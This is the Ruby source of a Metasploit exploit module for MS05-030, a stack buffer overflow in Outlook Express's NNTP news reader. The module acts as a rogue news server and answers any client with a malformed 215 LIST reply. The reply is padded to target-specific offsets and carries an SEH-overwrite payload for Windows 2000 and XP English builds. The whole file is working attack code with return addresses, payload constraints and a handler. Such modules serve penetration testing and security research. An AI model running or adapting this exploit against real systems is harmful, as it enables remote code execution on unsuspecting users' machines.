GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/nntp/ms05_030_nntp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # TcpServer: this module does not connect out; it listens as an NNTP server
  # and acts only when a news reader connects to it. Seh provides
  # generate_seh_payload, used in on_client_data.
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::Remote::Seh

  # Module metadata: vulnerability references (CVE-2005-1213 / MS05-030),
  # payload constraints, and the two per-OS targets. Each target's 'Offset' is
  # the amount of filler text placed before the SEH record and 'Ret' is the
  # value handed to generate_seh_payload in on_client_data.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the news reader of Microsoft
          Outlook Express.
        },
        'Author' => 'MC',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-1213' ],
          [ 'OSVDB', '17306' ],
          [ 'BID', '13951' ],
          [ 'MSB', 'MS05-030' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'AllowWin32SEH' => true
        },
        # Payload is limited to 750 bytes, must avoid NUL, and is encoded as
        # upper-case alphanumerics; no NOPs are added by the framework.
        'Payload' => {
          'Space' => 750,
          'BadChars' => "\x00",
          'MaxNops' => 0,
          'StackAdjustment' => -3500,
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
        },
        'Platform' => 'win',
        # Offsets and return addresses are specific to these English builds;
        # other locales/service packs are not covered by this table.
        'Targets' => [
          ['Windows 2000 English SP0-SP4', { 'Offset' => 9624, 'Ret' => 0x75022ac4 }],
          ['Windows XP English SP0/SP1', { 'Offset' => 9596, 'Ret' => 0x71aa2461 }],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2005-06-14',
        'DefaultTarget' => 0,
        # Reliability/stability/side effects were never assessed for this module.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # SRVPORT defaults to 119, the conventional NNTP port, so that a client
    # configured with a plain news-server hostname reaches this listener.
    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The NNTPServer daemon port to listen on", 119 ])
      ]
    )
  end

  # Server greeting. Sends the "200" ready line twice to every client that
  # connects, before the client has issued any command.
  #
  # @param client [Rex::Socket] the connected client socket
  def on_client_connect(client)
    yup = "200\r\n"

    client.put(yup)
    client.put(yup)
  end

  # Responds to ANY client data, regardless of which NNTP command was sent,
  # with a single malformed LIST-style reply and then closes the connection.
  # From a defender's view the observable anomaly is an NNTP "215" response
  # whose group name is roughly target['Offset'] (≈9.6 KB) bytes long, far
  # beyond any legitimate newsgroup name.
  #
  # @param client [Rex::Socket] the connected client socket
  def on_client_data(client)
    # Abort if no payload can be generated for this client. The local `p` is
    # not referenced again; generate_seh_payload presumably picks up the
    # regenerated payload from module state — TODO confirm against the Seh mixin.
    return if ((p = regenerate_payload(client)) == nil)

    # "215 list" status line, then a "group" entry padded with Offset bytes of
    # random English text so the SEH record lands at the target-specific offset.
    filler = "215 list\r\n" + "group "
    filler << rand_text_english(target['Offset'])
    seh = generate_seh_payload(target.ret)
    # Trailing fields complete the list entry; the lone "." terminates the
    # multi-line response. NOTE(review): "\." in a double-quoted Ruby string is
    # just "." — the backslash is a redundant escape, not an extra byte.
    sploit = filler + seh + " 1 y\r\n\.\r\n"

    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
    client.put(sploit)

    # Start the payload handler, then drop the client; the module sends exactly
    # one response per connection.
    handler
    service.close_client(client)
  end
end